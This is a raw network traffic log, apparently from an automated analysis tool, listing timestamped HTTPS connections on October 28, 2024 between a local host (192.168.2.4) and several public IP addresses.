                                                                            Oct 28, 2024 09:36:21.092458010 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.092482090 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.093174934 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.093235970 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.093249083 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.093298912 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.136841059 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.136847973 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.136915922 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.209117889 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.209125996 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.209187031 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.209364891 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.209372044 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.209423065 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.210812092 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.210818052 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.210870028 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.253848076 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.253916025 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.261286020 CET4434975635.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:36:21.261557102 CET49756443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:36:21.261567116 CET4434975635.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:36:21.262691975 CET4434975635.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:36:21.263021946 CET49756443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:36:21.263156891 CET49756443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:36:21.263163090 CET4434975635.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:36:21.263190985 CET4434975635.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:36:21.326143980 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.326208115 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.326455116 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.326512098 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.327065945 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.327127934 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.370929956 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.370994091 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.372603893 CET49756443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:36:21.407804012 CET4434975635.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:36:21.408077002 CET49756443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:36:21.408154011 CET4434975635.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:36:21.408231974 CET49756443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:36:21.440345049 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.440413952 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.443164110 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.443226099 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.443850040 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.443903923 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.488085032 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.488149881 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.488174915 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.488231897 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.521276951 CET49735443192.168.2.4142.250.186.164
                                                                            Oct 28, 2024 09:36:21.521301031 CET44349735142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:36:21.560472965 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.560524940 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.560544014 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.560558081 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.560575962 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.560591936 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.561748028 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.561805964 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.604856014 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.604924917 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.668241024 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.668277979 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.668303967 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.668334961 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.668356895 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.668361902 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.668410063 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.668586969 CET49752443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:21.668616056 CET44349752104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.677777052 CET49758443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:21.677807093 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:21.677871943 CET49758443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:21.678263903 CET49758443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:21.678276062 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.211123943 CET49760443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:22.211141109 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.211918116 CET49760443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:22.212171078 CET49760443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:22.212178946 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.290224075 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.290602922 CET49758443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:22.290611982 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.291718006 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.292140007 CET49758443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:22.292280912 CET49758443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:22.292284966 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.292309999 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.336806059 CET49758443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:22.427236080 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.427421093 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.427645922 CET49758443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:22.428335905 CET49758443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:22.428344011 CET44349758104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.820152998 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.820655107 CET49760443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:22.820671082 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.820946932 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.821906090 CET49760443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:22.821955919 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.822376013 CET49760443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:22.863337040 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.960280895 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.960345030 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:22.960664034 CET49760443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:23.353204012 CET49760443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:23.353218079 CET44349760104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.334409952 CET49762443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:24.334454060 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.334520102 CET49762443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:24.334743023 CET49762443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:24.334758997 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.361735106 CET49763443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:24.361763000 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.361815929 CET49763443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:24.362487078 CET49763443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:24.362498999 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.983439922 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.984558105 CET49763443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:24.984570980 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.985064983 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.987341881 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.989989042 CET49763443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:24.989991903 CET49762443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:24.990008116 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.990070105 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.990462065 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.993098974 CET49762443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:24.993177891 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:24.993527889 CET49763443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:24.993534088 CET49762443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:25.039338112 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:25.039360046 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:25.125741959 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:25.125828981 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:25.127909899 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:25.128118992 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:25.128154039 CET49763443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:25.128268003 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:25.128318071 CET49762443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:25.129859924 CET49762443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:25.165421963 CET49762443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:25.165442944 CET44349762104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:25.397222042 CET49763443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:25.397239923 CET44349763104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:26.067287922 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:26.067337990 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:26.067401886 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:26.068821907 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:26.068839073 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:26.792949915 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:26.793513060 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:26.793540001 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:26.794626951 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:26.795280933 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:26.795479059 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:26.795795918 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:26.795994043 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:26.796051025 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:26.796123028 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:26.796128988 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:26.796339989 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:26.796416998 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.108788967 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.108915091 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.108982086 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.109004974 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.109095097 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.109200954 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.109268904 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.109282970 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.109371901 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.109421015 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.109426975 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.109464884 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.109471083 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.160628080 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.160636902 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.206376076 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.225076914 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.225591898 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.225652933 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.225661993 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.225821018 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.225866079 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.225872040 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.226032019 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.226099014 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.226105928 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.226202011 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.226238966 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.226246119 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.226871014 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.227020979 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.227061987 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.227092981 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.227260113 CET49765443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:27.227273941 CET44349765104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.270325899 CET49767443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:27.270375013 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.270522118 CET49767443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:27.270755053 CET49767443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:27.270788908 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.894443035 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.894728899 CET49767443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:27.894793034 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.896017075 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.896409988 CET49767443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:27.896570921 CET49767443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:27.896584034 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.896608114 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:27.940784931 CET49767443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:28.032012939 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:28.032169104 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:28.032241106 CET49767443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:28.032666922 CET49767443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:28.032716990 CET44349767104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:33.631707907 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:33.631831884 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:33.632217884 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:33.632217884 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:33.632323980 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.440514088 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.440953016 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:34.441015005 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.441553116 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.442539930 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:34.442678928 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.442919970 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:34.443083048 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:34.443121910 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.443237066 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:34.443269968 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.769314051 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.769586086 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.769671917 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:34.769686937 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.769720078 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.769774914 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:34.769818068 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.769963026 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.770065069 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:34.771481037 CET49768443192.168.2.4104.18.95.41
                                                                            Oct 28, 2024 09:36:34.771528959 CET44349768104.18.95.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.787458897 CET49769443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:34.787547112 CET44349769188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:34.787627935 CET49769443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:34.787969112 CET49769443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:34.788016081 CET44349769188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:34.789380074 CET49770443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:34.789421082 CET44349770188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:34.789472103 CET49770443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:34.789722919 CET49770443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:34.789740086 CET44349770188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:34.795233011 CET49771443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:34.795241117 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:34.795335054 CET49771443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:34.795523882 CET49771443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:34.795536041 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:35.396727085 CET44349770188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.397316933 CET49770443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.397336006 CET44349770188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.398761034 CET44349770188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.398828983 CET49770443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.399686098 CET49770443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.399697065 CET49770443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.399765968 CET44349770188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.399791956 CET49770443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.399816036 CET49770443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.400307894 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.400336981 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.400405884 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.400651932 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.400665998 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.404469013 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:35.405865908 CET44349769188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.406604052 CET49769443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.406645060 CET44349769188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.406831980 CET49771443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:35.406841040 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:35.407295942 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:35.407830000 CET49771443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:35.407912970 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:35.408101082 CET44349769188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.408171892 CET49769443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.408220053 CET49771443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:35.410283089 CET49769443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.410351038 CET49769443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.410378933 CET44349769188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.410386086 CET49769443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.410486937 CET49769443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.410793066 CET49773443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.410825968 CET44349773188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.410888910 CET49773443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.412219048 CET49773443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:35.412230015 CET44349773188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:35.451363087 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:35.544061899 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:35.544210911 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:35.544311047 CET49771443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:35.547070026 CET49771443192.168.2.4104.18.94.41
                                                                            Oct 28, 2024 09:36:35.547084093 CET44349771104.18.94.41192.168.2.4
                                                                            Oct 28, 2024 09:36:36.010335922 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.010997057 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.011008978 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.012476921 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.012573957 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.013485909 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.013592958 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.014219999 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.014231920 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.014314890 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.026830912 CET44349773188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.027120113 CET49773443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.027134895 CET44349773188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.028747082 CET44349773188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.028814077 CET49773443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.029530048 CET49773443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.029608011 CET44349773188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.059379101 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.064810991 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.080068111 CET49773443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.080075026 CET44349773188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.128324986 CET49773443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.713773012 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.713846922 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.713891983 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.713927031 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.713963032 CET44349772188.114.97.3192.168.2.4
                                                                            Oct 28, 2024 09:36:36.713967085 CET49772443192.168.2.4188.114.97.3
                                                                            Oct 28, 2024 09:36:36.713967085 CET49772443192.168.2.4188.114.97.3
